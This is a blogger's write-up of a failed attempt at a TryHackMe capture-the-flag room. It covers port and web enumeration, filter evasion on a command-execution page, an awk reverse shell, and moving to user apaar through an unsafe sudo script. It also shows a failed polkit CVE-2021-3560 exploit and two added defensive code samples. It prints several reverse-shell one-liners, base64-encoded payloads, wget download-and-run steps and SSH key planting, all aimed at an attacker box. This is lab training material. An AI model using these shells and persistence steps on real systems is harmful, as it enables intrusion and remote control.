# TryHackMe - Chillhack I - Failed Attempt

Burned out from learning Active Directory, I was told by Jael Koh that this is an easy CTF challenge. I didn't realize what kind of rabbit hole I had gotten myself into.

This is a painful but necessary experience. Let's begin.

## 1. Enumeration:

With `autorecon` and `nmap` running, along with `ffuf`, I got some information about what I'm dealing with to begin:

```shell
┌──(kali㉿kali)-[~]
└─$ sudo $(which autorecon) -t target   
[sudo] password for kali: 
[*] Scanning target 10.10.126.168
[*] [10.10.126.168/all-tcp-ports] Discovered open port tcp/22 on 10.10.126.168
[*] [10.10.126.168/all-tcp-ports] Discovered open port tcp/80 on 10.10.126.168
[*] [10.10.126.168/all-tcp-ports] Discovered open port tcp/21 on 10.10.126.168
[*] [10.10.126.168/tcp/80/http/redirect-host-discovery] [-] No redirect detected at http://10.10.126.168:80/
[*] [10.10.126.168/tcp/80/http/vhost-enum] The target was not a hostname, nor was a hostname provided as an option. Skipping virtual host enumeration.
[*] [10.10.126.168/tcp/80/http/known-security] [tcp/80/http/known-security] There did not appear to be a .well-known/security.txt file in the webroot (/).
[*] [10.10.126.168/tcp/80/http/curl-robots] [tcp/80/http/curl-robots] There did not appear to be a robots.txt file in the webroot (/).
[*] 22:43:05 - There are 6 scans still running against 10.10.126.168
[*] 22:44:05 - There are 5 scans still running against 10.10.126.168
[*] 22:45:07 - There are 4 scans still running against 10.10.126.168
[*] 22:46:09 - There are 3 scans still running against 10.10.126.168
[*] 22:47:10 - There are 3 scans still running against 10.10.126.168
[*] 22:48:12 - There are 3 scans still running against 10.10.126.168
[*] 22:49:13 - There are 3 scans still running against 10.10.126.168
[*] 22:50:15 - There are 3 scans still running against 10.10.126.168
[*] 22:51:16 - There are 3 scans still running against 10.10.126.168
[*] 22:52:18 - There are 3 scans still running against 10.10.126.168
[*] 22:53:19 - There are 3 scans still running against 10.10.126.168
[*] 22:54:20 - There are 3 scans still running against 10.10.126.168
[*] 22:55:22 - There are 3 scans still running against 10.10.126.168
[*] 22:56:24 - There are 3 scans still running against 10.10.126.168
...
...
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sV -A -O -p21,22,80 10.10.126.168
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 22:46 +07
Nmap scan report for 10.10.126.168 (10.10.126.168)
Host is up (0.29s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.11.135.134
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e0:11:08:fd:55:35:e1:9b:26:35:33:64:ba:1e:ae:d6 (RSA)
|   256 cc:8d:5e:ac:00:e0:f8:1c:cd:86:c0:91:f1:2d:1c:4c (ECDSA)
|_  256 f2:83:32:96:bd:84:72:80:ec:1d:57:90:66:2f:a8:13 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Game Info
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 (99%), Linux 3.2 - 4.14 (96%), Linux 4.15 - 5.19 (96%), Linux 2.6.32 - 3.10 (96%), Linux 5.4 (95%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.32 - 3.13 (94%), Linux 5.0 - 5.14 (94%), Android 9 - 10 (Linux 4.9 - 4.14) (93%), Android 10 - 12 (Linux 4.14 - 4.19) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   295.24 ms 10.11.0.1 (10.11.0.1)
2   295.86 ms 10.10.126.168 (10.10.126.168)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.78 seconds
...
...
┌──(kali㉿kali)-[~]
└─$ ffuf -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '.php' -u "http://10.10.126.168:80/FUZZ" -t 40

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.126.168:80/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.php                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 338ms]
                        [Status: 200, Size: 35184, Words: 16992, Lines: 644, Duration: 340ms]
images                  [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 1571ms]
contact.php             [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2541ms]
css                     [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 297ms]
js                      [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 311ms]
fonts                   [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 297ms]
secret                  [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 304ms]
.php                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 270ms]
                        [Status: 200, Size: 35184, Words: 16992, Lines: 644, Duration: 270ms]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 243ms]
:: Progress: [441094/441094] :: Job [1/1] :: 132 req/sec :: Duration: [0:51:30] :: Errors: 0 ::
...                                                                                ...                                                             
┌──(kali㉿kali)-[~]
└─$ ffuf -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '' -u "http://10.10.126.168:80/FUZZ.html" -t 40 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.126.168:80/FUZZ.html
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

                        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 300ms]
index                   [Status: 200, Size: 35184, Words: 16992, Lines: 644, Duration: 299ms]
news                    [Status: 200, Size: 19718, Words: 9096, Lines: 331, Duration: 828ms]
contact                 [Status: 200, Size: 18301, Words: 8553, Lines: 307, Duration: 2671ms]
about                   [Status: 200, Size: 21339, Words: 9838, Lines: 338, Duration: 3657ms]
blog                    [Status: 200, Size: 30279, Words: 15218, Lines: 544, Duration: 4764ms]
team                    [Status: 200, Size: 19868, Words: 9364, Lines: 359, Duration: 301ms]
                        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 237ms]
:: Progress: [220547/220547] :: Job [1/1] :: 164 req/sec :: Duration: [0:24:39] :: Errors: 0 ::

┌──(kali㉿kali)-[~]
└─$ 

```

Next, I quickly went over the website and noticed there's command execution on `/secret`. With help from a friend, I quickly went through some shells and commands:

```shell
bash -i >& /dev/tcp/[Attack_Box_IP]/4444 0>&1
echo d2hvYW1p | base64 -d | sh
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.11.135.134",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])'
mkfifo /tmp/p; /bin/sh -i < /tmp/p 2>&1 | nc 10.11.135.134 4444 > /tmp/p
echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoIjEwLjExLjEzNS4xMzQiLDQ0NDQpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwpKTtzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIl0pJw== | base64 -d | python3
...
...
```

All of them got filtered. I figured `python`, `python3`, `nc`, `bash`, `sh` got filtered server side.

Following some suggestions, I tried:
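Why a filter like this is the wrong control, as an added example (not code from the room or the original post): it compares a word denylist built from the five names above with an allowlist dispatcher. The word-by-word matching and the `date`/`kernel` actions are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example: word denylist vs. allowlist dispatch for a web "run command" form.

# The five names the write-up reports as filtered (assumed: matched per word).
DENYLIST="python python3 nc bash sh"

# denylist_allows CMD: exit 0 if the assumed filter would pass CMD to a shell.
denylist_allows() {
    set -f                          # split on whitespace without globbing
    for word in $1; do
        for bad in $DENYLIST; do
            if [ "$word" = "$bad" ]; then set +f; return 1; fi
        done
    done
    set +f
    return 0
}

# allowlist_run ACTION: the request only selects one of a fixed set of
# commands; the request text itself never reaches a shell.
# (Hypothetical actions, chosen for the example.)
allowlist_run() {
    case "$1" in
        date)   date -u +%Y-%m-%dT%H:%M:%SZ ;;
        kernel) uname -sr ;;
        *)      echo "rejected: unknown action" >&2; return 1 ;;
    esac
}

# verdicts CMD: print how each design treats the same request.
verdicts() {
    if denylist_allows "$1"; then d=passed; else d=blocked; fi
    if allowlist_run "$1" >/dev/null 2>&1; then a=executed; else a=rejected; fi
    printf '%s|denylist=%s|allowlist=%s\n' "$1" "$d" "$a"
}

# Constructed sample requests, using command shapes that appear on this page.
verdicts 'echo d2hvYW1p | base64 -d | sh'
verdicts 'which awk'
verdicts "awk 'BEGIN{...}'"
verdicts 'date'
```

Any interpreter that is not named on the denylist passes it, while the allowlist rejects everything except the operations the application was built to offer.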

```
which tclsh
which awk
which node
which lua
```

I got a response from `which awk` so I decided to go with this payload:

```awk
awk 'BEGIN{s="/inet/tcp/0/10.11.135.134/4444";while(1){do{printf "sh> " |& s;s |& getline c;if(c){while((c |& getline)>0)print $0 |& s;close(c);}}while(c!="exit");close(s);}}'
```

And I got the reverse shell:

```shell
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.11.135.134] from (UNKNOWN) [10.10.126.168] 34351
sh> python -c 'import pty; pty.spawn("/bin/bash")'
sh> ls 
images
index.php
sh> whoami
www-data
sh> sudo -l
Matching Defaults entries for www-data on ip-10-10-126-168:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-126-168:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
sh> cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"
sh> sudo /home/appar/.helpline.sh
sh> whoami
www-data
sh> ls -lah /home/apaar/.helpline.sh
-rwxrwxr-x 1 apaar apaar 286 Oct  4  2020 /home/apaar/.helpline.sh
```

As this shell is quite horrible (lack of output, and locked in place, unable to move out of `/var/www/html/secret`), I tried adjusting the `awk` payload:

```awk
awk 'BEGIN{s="/inet/tcp/0/10.11.135.134/4444";while(1){do{printf "bash> " |& s;s |& getline c;if(c){while((c |& getline)>0)print $0 |& s;close(c);}}while(c!="exit");close(s);}}'
```

```shell
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.11.135.134] from (UNKNOWN) [10.10.126.168] 38681
bash> ls
images
index.php
bash> sudo /home/appar/.helpline.sh
bash> ls -lah /home/apaar/.helpline.sh
-rwxrwxr-x 1 apaar apaar 286 Oct  4  2020 /home/apaar/.helpline.sh
bash> ls -a /home/apaar
.
..
.bash_history
.bash_logout
.bashrc
.cache
.gnupg
.helpline.sh
.profile
.ssh
.viminfo
local.txt
bash> grep -RIn --exclude-dir={proc,sys,dev,run} -E '^[[:alnum:]._-]{1,30}:[[:graph:]]{1,30}$' / 2>/dev/null | head
```

Still, that's a bad payload.

Anyway, moving on. I started thinking of a way to get a decent bash shell using `wget`.

I made a big mistake using this ~~wget url > /tmp/linpeas.sh~~. This is a big mistake. You are not supposed to use `>` with `wget`. The `>` operator grabbed **wget’s progress text**, not the file.\
Result → zero-byte file ⇒ nothing to execute ⇒ connection closes as soon as the stub exits.

I organized my thoughts and proceeded with downloading the `shell`:

```shell
bash> wget http://10.11.135.134:80/chillhack.sh -O /tmp/x           
bash> chmod +x /tmp/x
bash> /tmp/x
```

I got a decent shell now:

```shell
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 6666                                              
listening on [any] 6666 ...
connect to [10.11.135.134] from (UNKNOWN) [10.10.126.168] 56742
bash: cannot set terminal process group (835): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ip-10-10-126-168:/var/www/html/secret$ cd /tmp
cd /tmp
www-data@ip-10-10-126-168:/tmp$ wget http://10.11.135.134:80/linpeas.sh
wget http://10.11.135.134:80/linpeas.sh
--2025-06-12 17:21:22--  http://10.11.135.134/linpeas.sh
Connecting to 10.11.135.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 839046 (819K) [text/x-sh]
Saving to: 'linpeas.sh.1'

     0K .......... .......... .......... .......... ..........  6% 81.8K 9s
    50K .......... .......... .......... .......... .......... 12%  165K 7s
   100K .......... .......... .......... .......... .......... 18%  163K 5s
   150K .......... .......... .......... .......... .......... 24% 7.70M 4s
   200K .......... .......... .......... .......... .......... 30% 6.29M 3s
   250K .......... .......... .......... .......... .......... 36%  172K 3s
   300K .......... .......... .......... .......... .......... 42% 7.30M 2s
   350K .......... .......... .......... .......... .......... 48% 9.84M 2s
   400K .......... .......... .......... .......... .......... 54% 4.52M 1s
   450K .......... .......... .......... .......... .......... 61%  344M 1s
   500K .......... .......... .......... .......... .......... 67%  174K 1s
   550K .......... .......... .......... .......... .......... 73%  349M 1s
   600K .......... .......... .......... .......... .......... 79% 11.1M 0s
   650K .......... .......... .......... .......... .......... 85% 4.26M 0s
   700K .......... .......... .......... .......... .......... 91%  163K 0s
   750K .......... .......... .......... .......... .......... 97%  357M 0s
   800K .......... .........                                  100% 75.1M=2.2s

2025-06-12 17:21:24 (380 KB/s) - 'linpeas.sh.1' saved [839046/839046]

www-data@ip-10-10-126-168:/tmp$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<mp$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ip-10-10-126-168:/tmp$ ls
ls
chill       chillhack.elf  chillhack2.sh  linpeas.sh.1  sh.perm  x
chill.file  chillhack.sh   linpeas.sh     sh.link       shells
www-data@ip-10-10-126-168:/tmp$ ./linpeas.sh.1
./linpeas.sh.1
bash: ./linpeas.sh.1: Permission denied
www-data@ip-10-10-126-168:/tmp$ chmod +x linpeas.sh.1
chmod +x linpeas.sh.1
www-data@ip-10-10-126-168:/tmp$ ./linpeas.sh.1
./linpeas.sh.1
...
...
Vulnerable to CVE-2021-3560

```

## **2. Here the pain began...**

I dived deep into the CVE-2021-3560 rabbit hole.

I tried every payload out there:

```payload
https://github.com/pashayogi/ROOT-CVE-2021-3560/blob/main/root.sh
https://www.exploit-db.com/exploits/50011
https://github.com/UNICORDev/exploit-CVE-2021-3560/blob/main/exploit-CVE-2021-3560.py
...
...
```

The more I tried, the harder I fell into the rabbit hole.

So I stopped and looked for a write-up, and a whole can of worms popped open. This room is not as simple as it was labeled.

I asked my friend about this code:

```shell
sh> cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"
```

The thing about this code is that there's no filtering of the input; it just executes `msg` through `$msg 2>/dev/null`.

Looking at the file with `ls -lah`:

```shell
bash> ls -lah /home/apaar/.helpline.sh
-rwxrwxr-x 1 apaar apaar 286 Oct  4  2020 /home/apaar/.helpline.sh
```

This file is owned by `apaar`, so we can only get `apaar`'s shell; we can't get `root`'s shell here. Let's continue.

```shell
www-data@ip-10-10-126-168:/var/www/html/secret$ sudo -u apaar /home/apaar/.helpline.sh
<html/secret$ sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: i
i
Hello user! I am i,  Please enter your message: /bin/bash
/bin/bash


id
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
apaar@ip-10-10-126-168:/var/www/html/secret$
```
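The `$msg 2>/dev/null` line in `.helpline.sh` next to a hardened form, as an added example (not the room's code and not from the original post). The function names, the log-file argument and the letters-only name rule are assumptions made for the illustration; prompts are omitted and input is read from stdin.

```shell
#!/bin/sh
# Added example: the helpline data flow, vulnerable and hardened.

# Same flaw as the script shown above: the message is expanded unquoted in
# command position, so its first word is run as a program.
helpline_vulnerable() {
    read -r person
    read -r msg
    $msg 2>/dev/null
    echo "Thank you for your precious time!"
}

# Hardened: the input is validated and stored as data. Nothing the caller
# typed is ever placed in command position.
# $1 = file that receives the messages (hypothetical log path).
helpline_hardened() {
    hl_log=$1
    IFS= read -r person
    IFS= read -r msg
    case "$person" in
        ''|*[!A-Za-z]*) echo "invalid name" >&2; return 1 ;;
    esac
    # Drop control characters and cap the length before writing the record.
    clean=$(printf '%s' "$msg" | tr -d '\000-\037\177' | cut -c1-500)
    printf '%s\t%s\t%s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$person" "$clean" >> "$hl_log"
    echo "Thank you for your precious time!"
}

# Feed both versions the same constructed input: name "i", message "id -un".
helpline_demo() {
    demo_log=$(mktemp)
    echo "vulnerable: $(printf 'i\nid -un\n' | helpline_vulnerable | head -n 1)"
    echo "hardened:   $(printf 'i\nid -un\n' | helpline_hardened "$demo_log" | head -n 1)"
    echo "logged:     $(cut -f3 "$demo_log")"
    rm -f "$demo_log"
}
helpline_demo
```

With the hardened body, the `(apaar : ALL) NOPASSWD` sudo rule from the `sudo -l` output would only let `www-data` append a message as `apaar`, not run a command as that user.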

## **At that point of the night, it was 2AM, I decided to read some writeups in a serious way. Reading through writeups I realized I don't know as much as I thought I did.**

There's a small trick from the writeups that allowed me to `ssh` into the machine; with that, I can pivot to the internal website that I didn't notice while reading the `Linpeas.sh` report. But I was stubborn. I decided to force `CVE-2021-3560` to work.

I started by generating an `ssh` key pair and sent the public key to `apaar`'s side:

```shell
┌──(kali㉿kali)-[~]
└─$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): id_rsa_apaar
Enter passphrase for "id_rsa_apaar" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa_apaar
Your public key has been saved in id_rsa_apaar.pub
The key fingerprint is:
SHA256:FWF9Lv49OEzQinq4Xv9NmgdxWL05c05pPG+3Yv/76fs kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|          +o    .|
|         . .. ...|
|          . .o+ +|
|         . ..+.@o|
|        S ..o.+o*|
|         . ..o  =|
|        o.  o.o+o|
|       o...  **+o|
|      .oo  .o+*BE|
+----[SHA256]-----+

┌──(kali㉿kali)-[~]
└─$ mousepad id_rsa_apaar.pub
```

```shell
apaar@ip-10-10-126-168:~$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCVCLFypXMshUlVLz94oEb9FvJ+r6+IMe9tjf6zC/reoYgd4s9FmIVhtHimr0yIFH8dbURh6n15PbxSbpyGWxCQlS44dJmRcTXasJwl7OCdZxXtloINnmFOEaiXWJXnO4NVcDnIPECr3S9O5TaTDCnOBk0uc2hGsbHPcs/JBeVUGIXJhPh+EH0NFR1uN76fp6hkFt3vOU0N2UCnOiavYjCyJlSTFHdRJTBHfHCeiDEpNESzI3ohvaOZqf4/LXZpCtTFtrTAkeqRxLgcoxmmJlCuD/wkq0rXyFCwsJrczLRBGjGIcmHUysn+/vBJs92HVAD2o0DodWsAeMb5gXEhzcgoOuNe1MMGtBz16dOXag8bQ8aVOM8el1xKNo1aB53oKWOW4+YQTNnVGOEuDEg33+TD+dFy8iaiuqsfvI1g3uzh9FS05NXQGWhTaZoV0r+cYiqT0ZBxEP7tk2lQaHCuV7pV+y2ApgDL4dkFR9tnhthl2d+bjTd3fUrijkT6khRzuK8= kali@kali >> /home/apaar/.ssh/authorized_keys
<zuK8= kali@kali >> /home/apaar/.ssh/authorized_keys
apaar@ip-10-10-126-168:~$ ls -la
ls -la
total 52
drwxr-xr-x 6 apaar apaar 4096 Jun 12 19:30 .
drwxr-xr-x 6 root  root  4096 Jun 12 15:27 ..
-rw------- 1 apaar apaar    0 Oct  4  2020 .bash_history
-rw-r--r-- 1 apaar apaar  220 Oct  3  2020 .bash_logout
-rw-r--r-- 1 apaar apaar 3771 Oct  3  2020 .bashrc
drwx------ 2 apaar apaar 4096 Oct  3  2020 .cache
drwx------ 3 apaar apaar 4096 Jun 12 19:20 .gnupg
-rwxrwxr-x 1 apaar apaar  286 Oct  4  2020 .helpline.sh
-rw-r--r-- 1 apaar apaar  807 Oct  3  2020 .profile
drwxr-xr-x 2 apaar apaar 4096 Jun 12 19:01 .ssh # Hidden .ssh directory
-rw------- 1 apaar apaar  817 Oct  3  2020 .viminfo
-rw-rw---- 1 apaar apaar   46 Oct  4  2020 local.txt
```

Then I `ssh` to apaar:

```shell
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa_apaar apaar@10.10.126.168 
apaar@10.10.126.168's password: 

┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa_apaar apaar@10.10.126.168
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-138-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu 12 Jun 2025 07:37:15 PM UTC

  System load:  0.0                Processes:             172
  Usage of /:   35.7% of 18.53GB   Users logged in:       0
  Memory usage: 55%                IPv4 address for eth0: 10.10.126.168
  Swap usage:   0%


Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Your Hardware Enablement Stack (HWE) is supported until April 2025.

Last login: Sun Oct  4 14:05:57 2020 from 192.168.184.129
apaar@ip-10-10-126-168:~$
```

I was very stubborn so I decided to give the `CVE-2021-3560` a try one last time.

```shell
apaar@ip-10-10-126-168:~$ pwd
/home/apaar
apaar@ip-10-10-126-168:~$ cd /temp
-bash: cd: /temp: No such file or directory
apaar@ip-10-10-126-168:~$ cd /tmp
apaar@ip-10-10-126-168:/tmp$ wget http://10.11.135.134:80/root.sh
--2025-06-12 19:43:12--  http://10.11.135.134/root.sh
Connecting to 10.11.135.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3253 (3.2K) [text/x-sh]
Saving to: ‘root.sh’

root.sh                                                    100%[========================================================================================================================================>]   3.18K  --.-KB/s    in 0.001s  

2025-06-12 19:43:12 (3.66 MB/s) - ‘root.sh’ saved [3253/3253]

apaar@ip-10-10-126-168:/tmp$ chmod +x root.sh
apaar@ip-10-10-126-168:/tmp$ ./root.sh
[*] Vulnerable version of polkit found
[*] Determining dbus-send timing
[*] Attempting to create account


^Capaar@ip-10-10-126-168:/tmp$ exit
```

At that point I gave up on this CTF. This CTF deserves a re-run.

CTF ended. Flag found: `1/2`
